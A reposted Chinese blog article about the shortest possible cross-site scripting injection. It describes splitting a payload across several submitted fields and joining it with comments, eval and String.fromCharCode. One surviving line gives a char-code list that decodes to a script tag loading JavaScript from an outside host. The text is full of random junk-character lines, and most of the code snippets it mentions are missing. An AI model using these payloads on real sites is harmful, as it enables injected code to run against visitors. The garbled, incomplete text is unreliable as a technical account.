微慑信息网

最短的跨站代码

[转贴] 最短的跨站代码
那天剑心问我,最短的跨站语句是多少?要放在以前,我一定会这样想,正常的跨站代码: ,查一下,一共27个字符。嘿嘿,不过,这之前我在《黑客手册》上看到了他的一篇文章,《疯狂的跨站之行》,在这其中提到了跨站语句的另一种方法:
7 o1 C) Z$ J& L2 c以下是代码片段:
2 m% Z4 s' n) n* Z6 L* L$ |* T, Y+ m( i: x6 O
3 A# A# Q$ T8 {+ N' [

# J" h" {- G6 C; j
$ O/ V0 h l4 J7 X) S: D: f% m* c4 M5 Q' W, Q- L# y
! Z/ j# p8 V, _% X4 K: c4 k5 W
8 F& M7 K6 g, h9 A+ K
' b: {# t! ]& ]% z5 A" W
- U6 J2 T- S3 Z P7 ~
/ L R7 f. _% z.
8 W4 F: B8 |% I4 S! B7 Q/ O将这些语句分别写入,只要所写入的语句在一个页面中显示,那么这些代码最后就会引入到变量z中,总到一块就是:
( a6 |* |+ ? G! P; Z+ U以下是代码片段:
2 a! K* q, ?! l% c9 A+ W; _7 vdocument.write("")9 [+ |* D5 N8 h6 r5 |5 H
. L3 U8 X3 i; R* E; b0 q( C# Y3 M8 T3 U- x
然后用eval()函数来执行这个z变量,就可以执行出跨站效果了。lcx在文章的评论中说,最小的有效利用代码可以是26个字母,就是,答案不就出来了,最小的跨站是26个字符。(今天在网上查找资料时,发现利用这种方法还可以少一个字符,就是:,用+=来代替=z+,嘿嘿,又可以减少一个字符,25个字符,不过,也好伤心,我好像只能在别人的基础上面有所突破!:( )。回复剑心后,他竟回了一个笑脸,我感觉这家伙一定又找出了更短的跨站方法。/jmdcw/
- e8 u. }6 @8 L, K8 r4 E+ d/ Q v( N* K( D# s
果不其然,今天翻开《黑客手册》第九期中的《phpwind漏洞之行》(因为一些原因,好久没有仔细看过书了),在其中提到了更短的跨站代码,如下:; e E6 m. r% Y0
% y9 ~
3 v. l ]4 Y/ p1 @7 @
以下是代码片段:; u1 x# E- Q" k' ^( ]' x

" E9 W: x2 J% c6 X3 D; q) w. p" _, @& s9 F: s3 m# k
这其中的/*和*/是script的注释语句,将这些语句分别提交,同样的条件是这些提交的代码必须在一个页面中,这样最后所显示的就是: G* ?6 w4 : C( F: O& " e+ z S
N0 x2 G# g4 R& u- @& y' V O' H
9 v! n- s* q7 @. T
6 R5 y4 Y, d5 O I; C2 K7 x/ k0 V那么这个的最短的语句是多少呢?貌似") 转为10进制表示字符:/ q& m4 y/ x' p- V
& s# x8 e$ B. n& e9 Y/ K# H7 ^
100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,119,119,119,46,112,99,48,49,48,46,99,110,47,49,46,106,115,62,60,47,115,99,114,105,112,116,62,34,41,593 b0 Z5 D. w0 P( I
# c3 i: [; _( V7 M& Q
然后用eval加String.fromCharCode来执行:
3 e9 G4 m* 2 - H; B& k8 v- ~% I
3 I2 ^' Y" A2 V" e$ ]/ V下面就用剑心的方法来进行拆分:; C8 K9 ^! T+ v- H0 A d3 F4 h
, Q" D. K* s! o
& o7 X+ S: G( o* Y中间的....表示的字符和前面的一样,这其中最长的一个语句是:*/fromCharCode/* ,16个字符,因为这是script自已保留的函数名,拆分的话,就不能运行了,由此可以看出,最小的跨站语句是由所采用的函数来定的。

本文标题:最短的跨站代码
本文链接:
(转载请附上本文链接)
http://vulsee.com/archives/vulsee_2009/0427_6980.html
转载请附本站链接,未经允许不得转载,,谢谢:微慑信息网-VulSee.com » 最短的跨站代码
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

微慑信息网 专注工匠精神

访问我们联系我们